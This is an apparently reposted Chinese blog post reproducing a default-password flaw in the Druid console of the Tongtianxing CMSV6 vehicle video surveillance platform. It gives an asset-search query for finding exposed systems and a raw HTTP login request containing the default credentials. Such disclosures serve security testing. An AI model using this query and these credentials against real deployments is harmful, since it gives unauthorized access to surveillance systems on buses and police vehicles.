首页 > 其他分享 >【漏洞复现】通天星CMSV6车载视频监控平台 druid存在默认口令漏洞

【漏洞复现】通天星CMSV6车载视频监控平台 druid存在默认口令漏洞

时间:2024-03-27 15:58:53浏览次数:28  
标签:视频 zh 天星 druid 车载 漏洞 CMSV6 监控

免责声明:文章来源互联网收集整理,文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

一、漏洞简介

通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台 druid存在默认口令漏洞。

二、影响版本

  • 通天星CMSV6车载视频监控平台

三、资产测绘

  • hunterweb.body="./open/webApi.html"
  • 特征

image.png

四、漏洞复现

POST /druid/submitLogin HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 42
Connection: close
Cookie: JSESSIONID=4F7D8A071EAC19E6196D1775D84D2F8D

loginUsername=ttx&loginPassword=ttx123456.

image-20240327155106521

image-20240327155411478

标签:视频,zh,天星,druid,车载,漏洞,CMSV6,监控
From: https://blog.csdn.net/qq_40550150/article/details/137080258

相关文章

  • 36.网络游戏逆向分析与漏洞攻防-游戏网络通信数据解析-数据解码器的实现
    免责声明:内容仅供学习参考,请合法利用知识,禁止进行违法犯罪活动!如果看不懂、不知道现在做的什么,那就跟着做完看效果内容参考于:易道云信息技术研究院VIP课上一个内容:35.登录成功数据包内容分析码云地址(master分支):https://gitee.com/dye_your_fingers/titan码云版本号:9474c7......
  • 【漏洞复现】MaxView系统dynamiccontent.properties接口处存在RCE漏洞
              免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。      ......
  • 【论文项目复现1】漏洞检测项目复现_VulDeeLocator
    复现环境Ubuntu20.04CPU:32GGPU:11G2080tiSource2slice:clang-6.0+llvm+dg(dg:https://github.com/mchalupa/dg)、gcc-9.5,g++-9.5DatapreprocessandModeltraining:python3.6+tensorflow1.6+keras2.1.2+gensim3.4建议用conda配置环境,包括cuda9.0,cudn......
  • web渗透测试漏洞流程:红队资产信息收集之子域名信息收集
    红队资产信息收集1.企业域名信息收集1.1主域名信息收集1.1.1主域名的whois信息1.2.4Whois信息在线收集地址1.2子域名信息收集1.2.1为什么要进行子域名枚举1.2.2子域名枚举搜索方法1.2.2.1搜索引擎查询子域名1.2.2.2资产引擎搜索子域名1.2.2.......
  • 3. 文件上传漏洞——漏洞总结笔记
    一、文件上传漏洞前提条件:能上传webshell(若仅让上传图片,而又绕不过去,则不行)webshell路径可知(需要访问目标,不知道则访问不了)webshell 可以被访问webshell可以被解析(即可以显示页面;若返回页面直接显示代码,并没有解析)判断确认是什么过滤?上传任意......
  • 2024-03-26 16:26:50.745 [main] INFO c.a.d.s.b.a.DruidDataSourceAutoConfigure -
    2024-03-2616:42:38.759[main]INFOc.a.d.s.b.a.DruidDataSourceAutoConfigure-InitDruidDataSource2024-03-2616:42:43.114[main]INFOcom.alibaba.druid.pool.DruidDataSource-{dataSource-1}inited2024-03-2616:42:47.348[main]INFOcom.alibaba.druid.po......
  • Nacos 未授权访问漏洞测试
    漏洞描述:2020年12月29日,Nacos官方在github发布的issue中披露AlibabaNacos存在一个由于不当处理User-Agent导致的未授权访问漏洞。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作影响版本:Nacos<=2.0.0-ALPHA.1漏洞地址:GEThttp://IP:端口/nacos/v1/auth/......
  • 永恒之蓝漏洞复现(ms17-010)
    永恒之蓝漏洞复现(ms17-010)环境信息收集先扫描目标靶机IP进入MSF查看是否存在永恒之蓝的漏洞攻击永恒之蓝漏洞复现(ms17-010)环境攻击机:kali靶机:WindowsServer2008信息收集对ip进行收集开放什么端口先扫描目标靶机IP因为在同一个内网之中所以可以使用arp-......
  • XSS漏洞
    原理程序对输入和输出没有做合适的处理,导致恶意字符输出在前端时被浏览器当作有效代码解析执行后端代码将用户输入的字符当成了js代码去执行xss常用代码<script>alert(/xss/)onclick='alert(1)'onclick属性是HTML元素中的一个事件属性,它用于指定在元素被点击时执行......
  • vscan开源、轻量、快速、跨平台 的网站漏洞扫描工具
    https://github.com/veo/vscan 编译/安装/运行•参数说明•使用方法•使用场景•POC列表•自定义扫描器Features特征vscan快速的端口扫描、指纹探测功能快速的登录密码爆破功能快速的POC检测功能快速的敏感文件检测功能轻量、开源、跨平台使用支持指纹650(eHole)......